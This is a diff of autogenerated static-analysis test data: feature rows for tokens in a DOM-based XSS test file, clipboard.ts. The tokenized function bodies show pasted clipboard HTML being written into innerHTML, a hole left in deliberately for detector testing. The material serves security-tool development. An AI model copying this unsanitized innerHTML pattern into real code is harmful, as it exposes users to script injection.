getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:13:80:21 | plainText | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:13:80:21 | plainText | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:13:80:21 | plainText | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:13:80:21 | plainText | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:13:80:61 | plainTe ... plain') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:13:80:61 | plainTe ... plain') | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:13:80:61 | plainTe ... plain') | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:13:80:61 | plainTe ... plain') | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:13:80:61 | plainTe ... plain') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:13:80:61 | plainText | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:13:80:61 | plainText | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:13:80:61 | plainText | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:13:80:61 | plainText | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:13:80:61 | plainText | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:25:80:25 | e | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:25:80:25 | e | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:25:80:25 | e | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:25:80:25 | e | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:25:80:25 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:25:80:39 | e.clipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:25:80:39 | e.clipboardData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:25:80:39 | e.clipboardData | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:25:80:39 | e.clipboardData | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:25:80:39 | e.clipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:25:80:47 | e.clipb ... getData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:25:80:47 | e.clipb ... getData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:25:80:47 | e.clipb ... getData | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:25:80:47 | e.clipb ... getData | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:25:80:47 | e.clipb ... getData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:25:80:61 | e.clipb ... plain') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:25:80:61 | e.clipb ... plain') | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:25:80:61 | e.clipb ... plain') | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:25:80:61 | e.clipb ... plain') | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:25:80:61 | e.clipb ... plain') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:25:80:61 | exceptional return of e.clipb ... plain') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:25:80:61 | exceptional return of e.clipb ... plain') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:25:80:61 | exceptional return of e.clipb ... plain') | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:25:80:61 | exceptional return of e.clipb ... plain') | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:25:80:61 | exceptional return of e.clipb ... plain') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:27:80:39 | clipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:27:80:39 | clipboardData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:27:80:39 | clipboardData | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:27:80:39 | clipboardData | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:27:80:39 | clipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:41:80:47 | getData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:41:80:47 | getData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:41:80:47 | getData | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:41:80:47 | getData | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:41:80:47 | getData | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:80:49:80:60 | 'text/plain' | CalleeFlexibleAccessPath | e.clipboardData.getData | | autogenerated/Xss/DomBasedXss/clipboard.ts:80:49:80:60 | 'text/plain' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:80:49:80:60 | 'text/plain' | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12648,6 +95030,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:80:49:80:60 | 'text/plain' | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | | autogenerated/Xss/DomBasedXss/clipboard.ts:80:49:80:60 | 'text/plain' | enclosingFunctionName | getClipboardData | | autogenerated/Xss/DomBasedXss/clipboard.ts:80:49:80:60 | 'text/plain' | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:82:11:82:25 | /^https?:\\/\\//i | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:82:11:82:25 | /^https?:\\/\\//i | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:82:11:82:25 | /^https?:\\/\\//i | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:82:11:82:25 | /^https?:\\/\\//i | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:82:11:82:25 | /^https?:\\/\\//i | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:82:11:82:30 | /^https?:\\/\\//i.test | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:82:11:82:30 | /^https?:\\/\\//i.test | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:82:11:82:30 | /^https?:\\/\\//i.test | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:82:11:82:30 | /^https?:\\/\\//i.test | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:82:11:82:30 | /^https?:\\/\\//i.test | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:82:11:82:41 | /^https ... inText) | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:82:11:82:41 | /^https ... inText) | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:82:11:82:41 | /^https ... inText) | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:82:11:82:41 | /^https ... inText) | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:82:11:82:41 | /^https ... inText) | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:82:11:82:41 | exceptional return of /^https ... inText) | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:82:11:82:41 | exceptional return of /^https ... inText) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:82:11:82:41 | exceptional return of /^https ... inText) | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:82:11:82:41 | exceptional return of /^https ... inText) | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:82:11:82:41 | exceptional return of /^https ... inText) | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:82:27:82:30 | test | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:82:27:82:30 | test | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:82:27:82:30 | test | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:82:27:82:30 | test | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:82:27:82:30 | test | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:82:32:82:40 | plainText | CalleeFlexibleAccessPath | ?.test | | autogenerated/Xss/DomBasedXss/clipboard.ts:82:32:82:40 | plainText | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:82:32:82:40 | plainText | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12655,6 +95062,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:82:32:82:40 | plainText | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | | autogenerated/Xss/DomBasedXss/clipboard.ts:82:32:82:40 | plainText | enclosingFunctionName | getClipboardData | | autogenerated/Xss/DomBasedXss/clipboard.ts:82:32:82:40 | plainText | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:83:9:83:17 | dropItems | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:83:9:83:17 | dropItems | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:83:9:83:17 | dropItems | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:83:9:83:17 | dropItems | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:83:9:83:17 | dropItems | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:83:9:83:21 | dropItems.add | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:83:9:83:21 | dropItems.add | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:83:9:83:21 | dropItems.add | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:83:9:83:21 | dropItems.add | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:83:9:83:21 | dropItems.add | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:83:9:83:32 | dropIte ... inText) | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:83:9:83:32 | dropIte ... inText) | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:83:9:83:32 | dropIte ... inText) | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:83:9:83:32 | dropIte ... inText) | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:83:9:83:32 | dropIte ... inText) | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:83:9:83:32 | exceptional return of dropIte ... inText) | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:83:9:83:32 | exceptional return of dropIte ... inText) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:83:9:83:32 | exceptional return of dropIte ... inText) | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:83:9:83:32 | exceptional return of dropIte ... inText) | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:83:9:83:32 | exceptional return of dropIte ... inText) | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:83:19:83:21 | add | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:83:19:83:21 | add | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:83:19:83:21 | add | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:83:19:83:21 | add | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:83:19:83:21 | add | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:83:23:83:31 | plainText | CalleeFlexibleAccessPath | dropItems.add | | autogenerated/Xss/DomBasedXss/clipboard.ts:83:23:83:31 | plainText | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:83:23:83:31 | plainText | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12663,6 +95095,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:83:23:83:31 | plainText | enclosingFunctionName | getClipboardData | | autogenerated/Xss/DomBasedXss/clipboard.ts:83:23:83:31 | plainText | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:83:23:83:31 | plainText | receiverName | dropItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:11:87:20 | imageItems | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:11:87:20 | imageItems | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:11:87:20 | imageItems | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:11:87:20 | imageItems | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:11:87:20 | imageItems | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:11:87:44 | imageIt ... pItems) | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:11:87:44 | imageIt ... pItems) | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:11:87:44 | imageIt ... pItems) | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:11:87:44 | imageIt ... pItems) | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:11:87:44 | imageIt ... pItems) | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:11:87:44 | imageItems | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:11:87:44 | imageItems | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:11:87:44 | imageItems | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:11:87:44 | imageItems | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:11:87:44 | imageItems | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:24:87:28 | Array | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:24:87:28 | Array | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:24:87:28 | Array | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:24:87:28 | Array | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:24:87:28 | Array | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:24:87:33 | Array.from | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:24:87:33 | Array.from | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:24:87:33 | Array.from | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:24:87:33 | Array.from | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:24:87:33 | Array.from | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:24:87:44 | Array.f ... pItems) | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:24:87:44 | Array.f ... pItems) | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:87:24:87:44 | Array.f ... pItems) | enclosingFunctionBody | 